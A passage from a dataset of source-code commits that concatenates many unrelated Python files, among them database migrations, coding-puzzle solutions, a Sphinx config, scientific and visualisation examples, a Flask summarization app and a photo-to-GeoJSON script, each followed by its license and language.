sa.Column('phone', sa.Unicode(length=12), nullable=True),
sa.Column('placed_date', sa.DateTime(), nullable=True),
sa.Column('dj', sa.UnicodeText(), nullable=True),
sa.Column('thank_on_air', sa.Boolean(), nullable=True),
sa.Column('first_time', sa.Boolean(), nullable=True),
sa.Column('premiums', sa.Unicode(length=255), nullable=True),
sa.Column('address1', sa.Unicode(length=255), nullable=True),
sa.Column('address2', sa.Unicode(length=255), nullable=True),
sa.Column('city', sa.Unicode(length=255), nullable=True),
sa.Column('state', sa.Unicode(length=255), nullable=True),
sa.Column('zipcode', sa.Integer(), nullable=True),
sa.Column('amount', sa.Integer(), nullable=True),
sa.Column('recurring', sa.Boolean(), nullable=True),
sa.Column('paid_date', sa.DateTime(), nullable=True),
sa.Column('shipped_date', sa.DateTime(), nullable=True),
sa.Column('tshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('tshirtcolor', sa.Unicode(length=255), nullable=True),
sa.Column('sweatshirtsize', sa.Unicode(length=255), nullable=True),
sa.Column('method', sa.Unicode(length=255), nullable=True),
sa.Column('custid', sa.Unicode(length=255), nullable=True),
sa.Column('comments', sa.UnicodeText(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('orders')
### end Alembic commands ###
| agpl-3.0 | Python |
|
64dede2c9a3d489eb8c93200ea8788c26db6da31 | Create 6kyu_divisor_harmony.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/6kyu/6kyu_divisor_harmony.py | Solutions/6kyu/6kyu_divisor_harmony.py | def solve(a,b):
pairs={}
for i in range(a,b):
ratio=div_sum(i)/i
try: pairs[ratio]=pairs[ratio]+[i]
except: pairs[ratio]=[i]
return sum(min(i) for i in pairs.values() if len(i)>=2)
def div_sum(n):
return sum(i for i in range(1,n+1) if n%i==0)
| mit | Python |
|
de7b7d10e5776d631c15660255cf8ad2b85f3d25 | Create Beginner 10-A.py | unasuke/AtCoder,unasuke/AtCoder,unasuke/AtCoder | Beginner/10/10-A.py | Beginner/10/10-A.py | #AtCoder Beginner 10 A
name = raw_input()
print name + "pp"
| mit | Python |
|
d65e9246256709f2cec0fa863515cca0dc4acb0b | add config for sphinx documentation | LILiK-117bis/lilik_playbook,LILiK-117bis/lilik_playbook,LILiK-117bis/lilik_playbook | doc/source/conf.py | doc/source/conf.py | # -*- coding: utf-8 -*-
#
# lilik_playbook documentation build configuration file, created by
# sphinx-quickstart on Fri Apr 7 14:02:37 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.githubpages']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lilik_playbook'
copyright = u'2017, edoput, kaos, slash'
author = u'edoput, kaos, slash'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'lilik_playbookdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'lilik_playbook.tex', u'lilik\\_playbook Documentation',
u'edoput, kaos, slash', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
author, 'lilik_playbook', 'One line description of project.',
'Miscellaneous'),
]
| cc0-1.0 | Python |
|
871e9e4bdca027e577bdcde38f483e2de32c8528 | Add simple example | life360/apns-proxy-server,life360/apns-proxy-server,voyagegroup/apns-proxy-server,voyagegroup/apns-proxy-server | examples/simple.py | examples/simple.py | # -*- coding: utf-8 -*-
import time
from apns_proxy_client import APNSProxyClient
valid_token = "YOUR VALID TOKEN"
def main():
client = APNSProxyClient(host="localhost", port=5556, application_id="14")
i = 0
with client:
token = valid_token
client.send(token, 'Alert with default sound')
time.sleep(2)
client.send(token, 'Alert with custom sound', sound='custom')
time.sleep(2)
client.send(token, 'I am silent', sound=None)
time.sleep(2)
client.send(token, 'Alert with badge', badge=2)
time.sleep(2)
client.send(token, None, badge=99, sound=None)
time.sleep(2)
one_hour_later = int(time.time()) + (60 * 60)
client.send(token, 'I am long life', expiry=one_hour_later)
time.sleep(2)
client.send(token, 'I am low priority', priority=5)
time.sleep(2)
# For background fetch
client.send(token, None, sound=None, content_available=True)
time.sleep(2)
client.send(token, 'With custom field', custom={
'foo': True,
'bar': [200, 300],
'boo': "Hello"
})
time.sleep(2)
client.send(token, {
'body': 'This is JSON alert',
'action_loc_key': None,
'loc_key': 'loc key',
'loc_args': ['one', 'two'],
'launch_image': 'aa.png'
})
client.send(token, 'This message never send to device', test=True)
if __name__ == "__main__":
main()
print("Done")
| bsd-2-clause | Python |
|
9f7bd49350b0d1b8a8986b28db75a5b369bf7bb5 | Add py solution for 393. UTF-8 Validation | ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode | py/utf-8-validation.py | py/utf-8-validation.py | class Solution(object):
def validUtf8(self, data):
"""
:type data: List[int]
:rtype: bool
"""
it = iter(data)
while True:
try:
c = it.next() & 0xff
try:
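                    # count the leading 1 bits of the first byte: 0 means a
                    # single ASCII byte, otherwise it is the sequence length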
t = 0x80
n = 0
while t > 0:
if t & c:
n += 1
t >>= 1
else:
break
if n == 1 or n > 4:
return False
elif n > 1:
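                        # each of the n-1 continuation bytes must match 10xxxxxx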
for _ in xrange(n - 1):
c = it.next() & 0xff
if c & 0xc0 != 0x80:
return False
except StopIteration:
return False
except StopIteration:
return True
| apache-2.0 | Python |
|
fb70822079c47962f0f713bcea43af80fe58d93e | add example using the VTKMesh class | simphony/simphony-mayavi | examples/mesh_vtk_example.py | examples/mesh_vtk_example.py | from numpy import array
from simphony.cuds.mesh import Point, Cell, Edge, Face
from simphony.core.data_container import DataContainer
from simphony_mayavi.cuds.api import VTKMesh
points = array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
cells = [
[0, 1, 2, 3], # tetra
[4, 5, 6, 7, 8, 9, 10, 11]] # hex
faces = [[2, 7, 11]]
edges = [[1, 4], [3, 8]]
mesh = VTKMesh('example')
# add points
uids = [
mesh.add_point(
Point(coordinates=point, data=DataContainer(TEMPERATURE=index)))
for index, point in enumerate(points)]
# add edges
edge_uids = [
mesh.add_edge(
Edge(points=[uids[index] for index in element]))
for index, element in enumerate(edges)]
# add faces
face_uids = [
mesh.add_face(
Face(points=[uids[index] for index in element]))
for index, element in enumerate(faces)]
# add cells
cell_uids = [
mesh.add_cell(
Cell(points=[uids[index] for index in element]))
for index, element in enumerate(cells)]
if __name__ == '__main__':
from simphony.visualisation import mayavi_tools
# Visualise the Mesh object
mayavi_tools.show(mesh)
| bsd-2-clause | Python |
|
bdc062830a943a312dc6b56002f5ca6ae3990b80 | add example | cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy | examples/peer/peer_matrix.py | examples/peer/peer_matrix.py | import cupy
def main():
gpus = cupy.cuda.runtime.getDeviceCount()
for peerDevice in range(gpus):
for device in range(gpus):
if peerDevice == device:
continue
flag = cupy.cuda.runtime.deviceCanAccessPeer(device, peerDevice)
print(
f'Can access #{peerDevice} memory from #{device}: '
f'{flag == 1}')
if __name__ == '__main__':
main()
| mit | Python |
|
51530297a561fa9630f69c70810c1b4bbeb7ecf0 | Create testmessage table | dropbox/changes,dropbox/changes,dropbox/changes,dropbox/changes | migrations/versions/187eade64ef0_create_testmessage_table.py | migrations/versions/187eade64ef0_create_testmessage_table.py | """Create testmessage table
Revision ID: 187eade64ef0
Revises: 016f138b2da8
Create Date: 2016-06-21 16:11:47.905481
"""
# revision identifiers, used by Alembic.
revision = '187eade64ef0'
down_revision = '016f138b2da8'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'testmessage',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
sa.Column('artifact_id', sa.GUID(), nullable=False),
sa.Column('start_offset', sa.Integer(), nullable=False),
sa.Column('length', sa.Integer(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.ForeignKeyConstraint(['test_id'], ['test.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['artifact_id'], ['artifact.id'], ondelete='CASCADE'),
)
op.create_index('idx_testmessage_test_id', 'testmessage', ['test_id'], unique=False)
def downgrade():
op.drop_table('testmessage')
| apache-2.0 | Python |
|
cc84a5c71f84596af61b2de4a16cd62ff0209b16 | Add migration file | l-vincent-l/APITaxi,l-vincent-l/APITaxi,odtvince/APITaxi,openmaraude/APITaxi,openmaraude/APITaxi,odtvince/APITaxi,odtvince/APITaxi,odtvince/APITaxi | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | """Add hail migration fields
Revision ID: fd02d1c7d64
Revises: 59e5faf237f8
Create Date: 2015-04-15 12:04:43.286358
"""
# revision identifiers, used by Alembic.
revision = 'fd02d1c7d64'
down_revision = '59e5faf237f8'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('hail',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('creation_datetime', sa.DateTime(), nullable=False),
sa.Column('client_id', sa.Integer(), nullable=False),
sa.Column('client_lon', sa.Float(), nullable=False),
sa.Column('client_lat', sa.Float(), nullable=False),
sa.Column('taxi_id', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('emitted', 'received', 'sent_to_operator', 'received_by_operator', 'received_by_taxi', 'accepted_by_taxi', 'declined_by_taxi', 'incident_client', 'incident_taxi', 'timeout_client', 'timeout_taxi', 'outdated_client', 'outdated_taxi', name='hail_status'), nullable=False),
sa.Column('last_status_change', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('hail')
### end Alembic commands ###
| agpl-3.0 | Python |
|
dde52eb2bb035644e1147bbe21fcf9b1200a2e6b | Add example of section tree from SWC data block. | mgeplf/NeuroM,juanchopanza/NeuroM,wizmer/NeuroM,BlueBrain/NeuroM,liesbethvanherpe/NeuroM,lidakanari/NeuroM,eleftherioszisis/NeuroM | examples/section_tree_swc.py | examples/section_tree_swc.py | '''Example showing how to extract section information from SWC block'''
import numpy as np
from neurom import ezy
from neurom.io import swc
from neurom.core.tree import Tree
from neurom.core import section_neuron as sn
from neurom.core.dataformat import COLS
from neurom.core.dataformat import POINT_TYPE
class Section(object):
'''sections (id, (ids), type, parent_id)'''
def __init__(self, idx, ids=None, ntype=0, pid=-1):
self.id = idx
self.ids = [] if ids is None else ids
self.ntype = ntype
self.pid = pid
def __str__(self):
return 'Section(id=%s, ids=%s, ntype=%s, pid=%s)' % (self.id, self.ids,
self.ntype, self.pid)
def neurite_trunks(data_wrapper):
'''Get the section IDs of the intitial neurite sections'''
sec = data_wrapper.sections
return [ss.id for ss in sec
if ss.pid is not None and (sec[ss.pid].ntype == POINT_TYPE.SOMA and
ss.ntype != POINT_TYPE.SOMA)]
def soma_points(data_wrapper):
'''Get the soma points'''
db = data_wrapper.data_block
return db[db[:, COLS.TYPE] == POINT_TYPE.SOMA]
def add_sections(data_wrapper):
'''Make a list of sections from an SWC data wrapper'''
# get SWC ID to array position map
id_map = {-1: -1}
for i, r in enumerate(data_wrapper.data_block):
id_map[int(r[COLS.ID])] = i
fork_points = set(id_map[p] for p in data_wrapper.get_fork_points())
end_points = set(id_map[p] for p in data_wrapper.get_end_points())
section_end_points = fork_points | end_points
_sections = [Section(0)]
curr_section = _sections[-1]
parent_section = {-1: None}
for row in data_wrapper.data_block:
row_id = id_map[int(row[COLS.ID])]
if len(curr_section.ids) == 0:
curr_section.ids.append(id_map[int(row[COLS.P])])
curr_section.ntype = int(row[COLS.TYPE])
curr_section.ids.append(row_id)
if row_id in section_end_points:
parent_section[curr_section.ids[-1]] = curr_section.id
_sections.append(Section(len(_sections)))
curr_section = _sections[-1]
# get the section parent ID from the id of the first point.
for sec in _sections:
if sec.ids:
sec.pid = parent_section[sec.ids[0]]
data_wrapper.sections = [s for s in _sections if s.ids]
return data_wrapper
def make_tree(data_wrapper, start_node=0, post_action=None):
'''Build a section tree'''
# One pass over sections to build nodes
nodes = [Tree(np.array(data_wrapper.data_block[sec.ids]))
for sec in data_wrapper.sections[start_node:]]
# One pass over nodes to connect children to parents
for i in xrange(len(nodes)):
parent_id = data_wrapper.sections[i + start_node].pid - start_node
if parent_id >= 0:
nodes[parent_id].add_child(nodes[i])
if post_action is not None:
post_action(nodes[0])
return nodes[0]
def load_neuron(filename, tree_action=sn.set_neurite_type):
'''Build section trees from an h5 file'''
data_wrapper = swc.SWC.read(filename)
add_sections(data_wrapper)
trunks = neurite_trunks(data_wrapper)
trees = [make_tree(data_wrapper, trunk, tree_action)
for trunk in trunks]
# if any neurite trunk starting points are soma,
# remove them
for t in trees:
if t.value[0][COLS.TYPE] == POINT_TYPE.SOMA:
t.value = t.value[1:]
soma = sn.make_soma(soma_points(data_wrapper))
return sn.Neuron(soma, trees, data_wrapper)
def do_new_stuff(filename):
'''Use the section trees to get some basic stats'''
_n = load_neuron(filename)
n_sec = sn.n_sections(_n)
n_seg = sn.n_segments(_n)
sec_len = sn.get_section_lengths(_n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
def do_old_stuff(filename):
'''Use point tree to get some basic stats'''
_n = ezy.load_neuron(filename)
n_sec = ezy.get('number_of_sections', _n)[0]
n_seg = ezy.get('number_of_segments', _n)[0]
sec_len = ezy.get('section_lengths', _n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
if __name__ == '__main__':
fname = 'test_data/swc/Neuron.swc'
nrn = load_neuron(fname)
| bsd-3-clause | Python |
|
c560be326c10c1e90b17ba5c6562f55c44dea9f3 | Create main.py | googleinterns/smart-content-summary,googleinterns/smart-content-summary,googleinterns/smart-content-summary | GCP_deploy/main.py | GCP_deploy/main.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Web app for LaserTagger text summarizer """
from __future__ import print_function
from flask import Flask, render_template, request
from predict_main import construct_example
import nltk
import bert_example
import utils
import tagging_converter
import googleapiclient
import tagging
import bert_example_classifier
from nltk.tokenize.treebank import TreebankWordDetokenizer
from builtins import FileExistsError
app = Flask(__name__)
embedding_type = "POS"
label_map_file = "gs://publicly_available_models_yechen/best_hypertuned_POS/label_map.txt"
enable_masking = False
do_lower_case = True
try:
nltk.download('punkt')
except FileExistsError:
print("NLTK punkt exist")
try:
nltk.download('averaged_perceptron_tagger')
except FileExistsError:
print("NLTK averaged_perceptron_tagger exist")
if embedding_type == "Normal" or embedding_type == "Sentence":
vocab_file = "gs://lasertagger_training_yechen/cased_L-12_H-768_A-12/vocab.txt"
elif embedding_type == "POS":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS/vocab.txt"
elif embedding_type == "POS_concise":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS_concise/vocab.txt"
else:
raise ValueError("Unrecognized embedding type")
label_map = utils.read_label_map(label_map_file)
converter = tagging_converter.TaggingConverter(
tagging_converter.get_phrase_vocabulary_from_label_map(label_map), True)
id_2_tag = {tag_id: tagging.Tag(tag) for tag, tag_id in label_map.items()}
builder = bert_example.BertExampleBuilder(label_map, vocab_file,
128, do_lower_case, converter, embedding_type, enable_masking)
grammar_vocab_file = "gs://publicly_available_models_yechen/grammar_checker/vocab.txt"
grammar_builder = bert_example_classifier.BertGrammarExampleBuilder(grammar_vocab_file, 128, False)
def predict_json(project, model, instances, version=None):
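# Send the instances to a model deployed on Google Cloud AI Platform
# (the 'ml' v1 API) and return its predictions.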
service = googleapiclient.discovery.build('ml', 'v1')
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
response = service.projects().predict(
name=name,
body={'instances': instances}
).execute()
if 'error' in response:
raise RuntimeError(response['error'])
return response['predictions']
@app.route('/', methods=['GET'])
def home():
return render_template('index.html')
@app.route('/predict', methods=['POST'])
def predict():
inp_string = [x for x in request.form.values()]
sentence = nltk.word_tokenize(inp_string[0])
inputs, example = construct_example(sentence, builder)
val = predict_json("smart-content-summary", "Deployed_Models", [inputs])
try:
predicted_ids = val[0]["pred"]
except:
predicted_ids = val[0]
example.features['labels'] = predicted_ids
example.features['labels_mask'] = [0] + [1] * (len(predicted_ids) - 2) + [0]
labels = [id_2_tag[label_id] for label_id in example.get_token_labels()]
prediction = example.editing_task.realize_output(labels)
inputs_grammar, example_grammar = construct_example(prediction, grammar_builder)
grammar_prediction = predict_json("smart-content-summary", "grammar_checker", [inputs_grammar])
try:
grammar = grammar_prediction[0]["pred"][0]
except:
grammar = grammar_prediction[0][0]
prediction = TreebankWordDetokenizer().detokenize(prediction.split())
return render_template('index.html', input=inp_string[0], prediction_bert=prediction, grammar=grammar)
if __name__ == '__main__':
# For deploying to App Engine
app.run(host='127.0.0.1', port=8080, debug=True)
# For local deployment
# app.run(host='localhost', port=8080, debug=True)
| apache-2.0 | Python |
|
fc84c19cdbbe86b1a57efb3468cdfc26785ca4a6 | add utility helper to format table for console output | dariusbakunas/rawdisk | rawdisk/util/output.py | rawdisk/util/output.py | import numpy as np
def format_table(headers, columns, values, ruler='-'):
printable_rows = []
table = np.empty((len(values), len(columns)), dtype=object)
for row, value in enumerate(values):
table[row] = [str(getattr(value, column)) for column in columns]
column_widths = [
max(len(headers[col]), len(max(table[:, col], key=len)))
for col in range(len(columns))]
# print header
printable_rows.append(' '.join([header.ljust(column_widths[col])
for col, header in enumerate(headers)]))
printable_rows.append(' '.join([ruler * width for width in column_widths]))
for row in table:
printable_rows.append(' '.join([col.ljust(column_widths[idx])
for idx, col in enumerate(row)]))
return printable_rows
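# Example usage (with hypothetical objects exposing .index and .size attributes):
# for line in format_table(['Index', 'Size'], ['index', 'size'], partitions):
#     print(line)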
| bsd-3-clause | Python |
|
100a03003adf3f425d59b69e95078bd0f1e82193 | Add test script for segfault bug reported by Jeremy Hill. | visionegg/visionegg,visionegg/visionegg,visionegg/visionegg,visionegg/visionegg,visionegg/visionegg | test/reopen_screen.py | test/reopen_screen.py | #!/usr/bin/env python
# Test for bug reported by Jeremy Hill in which re-opening the screen
# would cause a segfault.
import VisionEgg
VisionEgg.start_default_logging(); VisionEgg.watch_exceptions()
from VisionEgg.Core import Screen, Viewport, swap_buffers
import pygame
from pygame.locals import QUIT,KEYDOWN,MOUSEBUTTONDOWN
from VisionEgg.Text import Text
from VisionEgg.Dots import DotArea2D
def run():
screen = Screen()
screen.parameters.bgcolor = (0.0,0.0,0.0) # black (RGB)
dots = DotArea2D( position = ( screen.size[0]/2.0, screen.size[1]/2.0 ),
size = ( 300.0 , 300.0 ),
signal_fraction = 0.1,
signal_direction_deg = 180.0,
velocity_pixels_per_sec = 10.0,
dot_lifespan_sec = 5.0,
dot_size = 3.0,
num_dots = 100)
text = Text( text = "Vision Egg dot_simple_loop demo.",
position = (screen.size[0]/2,2),
anchor = 'bottom',
color = (1.0,1.0,1.0))
viewport = Viewport( screen=screen, stimuli=[dots,text] )
# The main loop below is an alternative to using the
# VisionEgg.FlowControl.Presentation class.
quit_now = 0
while not quit_now:
for event in pygame.event.get():
if event.type in (QUIT,KEYDOWN,MOUSEBUTTONDOWN):
quit_now = 1
screen.clear()
viewport.draw()
swap_buffers()
screen.close()
print "run 1"
run()
print "run 2"
run()
print "done"
| lgpl-2.1 | Python |
|
35849cf3650c5815c0124f90fad3d3fa2ef9abc6 | Create InsertationSort2.py | MajidLashgarian/HackerRank,MajidLashgarian/HackerRank | InsertationSort2.py | InsertationSort2.py | def compareAndRep(numbers , a , b):
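# Swap the elements at indices a and b and return the (modified) list.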
temp = numbers[a]
numbers[a] = numbers[b]
numbers[b] = temp
return numbers
def printList(numbers):
strp = ""
for i in range(0 , len(numbers)):
strp += str(numbers[i])
if(i+1 < len(numbers)):
strp += " "
print strp
N = int(raw_input())
numbers = map(int , raw_input().strip().split(" "))
for i in range(1 , N):
for j in range (0 , i ):
if(numbers[i] < numbers[j]):
numbers = compareAndRep(numbers , i , j)
printList(numbers)
| mit | Python |
|
45136a5757ed362818216acdb390bb0c43bf35f7 | Create photos2geojson.py | trolleway/photo_tools | photos2map/photos2geojson.py | photos2map/photos2geojson.py | # -*- coding: UTF-8 -*-
import os, sys
import exiftool
import json
from fractions import Fraction
def progress(count, total, status=''):
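# Render a simple in-place text progress bar on stdout.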
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status))
sys.stdout.flush() # As suggested by Rom Ruben (see: http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console/27871113#comment50529068_27871113)
def get_args():
import argparse
p = argparse.ArgumentParser(description='Create a GeoJSON file of photo locations from EXIF GPS tags')
p.add_argument('path', help='Path to folder containing JPG files')
return p.parse_args()
def _get_if_exist(data, key):
if key in data:
return data[key]
return None
geojsonHeader='''
{
"type": "FeatureCollection",
"crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
"features": [
'''
geojsonFooter='''
]
}
'''
if __name__ == '__main__':
args = get_args()
file_list = []
for root, sub_folders, files in os.walk(args.path):
for name in files:
file_list += [os.path.join(root, name) ]
fs = open('photos.geojson','w')
fs.write(geojsonHeader+"\n")
fs.close()
fs = open('photos.geojson','a')
index = 0
IterationStep = 200
total = len(file_list)
while index < total:
with exiftool.ExifTool() as et:
metadata = et.get_tags_batch(['EXIF:GPSLongitude','EXIF:GPSLatitude','DateTimeOriginal'],file_list[index:index+IterationStep])
for record in metadata:
dict = json.dumps(record)
#print dict
geojsonString='{ "type": "Feature", "properties": { "filename": "%(SourceFile)s", "datetime": "%(EXIF:DateTimeOriginal)s" }, "geometry": { "type": "Point", "coordinates": [ %(EXIF:GPSLongitude)s, %(EXIF:GPSLatitude)s ] } }, '
exportString = geojsonString % {"SourceFile" : record['SourceFile'],'EXIF:DateTimeOriginal' : _get_if_exist(record,'EXIF:DateTimeOriginal'),"EXIF:GPSLatitude" : _get_if_exist(record,'EXIF:GPSLatitude'),"EXIF:GPSLongitude" : _get_if_exist(record,'EXIF:GPSLongitude')}
if _get_if_exist(record,'EXIF:GPSLatitude') and _get_if_exist(record,'EXIF:GPSLongitude'):
fs.write(exportString+"\n")
index = index+IterationStep
if index > total:
index=total
progress(index, len(file_list), status='Create geojson with photo locations, total = '+str(total))
fs = open('photos.geojson','a')
fs.write(geojsonFooter+"\n")
fs.close()
'''
cmd = ['exiftool', filepath]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
out, err = p.communicate('-GPSLongitude')
print out
'''
'''
mt = mimetypes.guess_type(filepath)[0]
if mt:
f = open(filepath, 'rb')
tags = exifread.process_file(f)
lat,lon = get_lat_lon(tags)
#print filepath.ljust(50),str(lat).ljust(20), str(lon).ljust(20)
exiftool E:\PHOTO\z_bat\geo\test1\IMG_20150228_231555.jpg"" -GPSLongitude -GPSLatitude --n -json
exiftool -stay_open True -@
'''
#python geo3.py "E:\PHOTO\z_bat\geo\test1"
| unlicense | Python |
|
97e46b93124758bec85d2e81a6843c22a265bce3 | Add entry point for GC repo importer | heiths/allura,apache/incubator-allura,heiths/allura,lym/allura-git,apache/allura,apache/allura,apache/incubator-allura,apache/allura,lym/allura-git,lym/allura-git,heiths/allura,heiths/allura,apache/incubator-allura,heiths/allura,lym/allura-git,apache/allura,apache/incubator-allura,apache/allura,lym/allura-git | ForgeImporters/setup.py | ForgeImporters/setup.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
google-code-repo = forgeimporters.google.code:GoogleRepoImporter
""",)
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
""",)
| apache-2.0 | Python |
76f473cd5d5a8ed1c6c5deb173587ce01e5b8f29 | add a proxmox inventory plugin | thaim/ansible,thaim/ansible | plugins/inventory/proxmox.py | plugins/inventory/proxmox.py | #!/usr/bin/env python
# Copyright (C) 2014 Mathieu GAUTHIER-LAFAYE <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
import os
import sys
from optparse import OptionParser
class ProxmoxNodeList(list):
def get_names(self):
return [node['node'] for node in self]
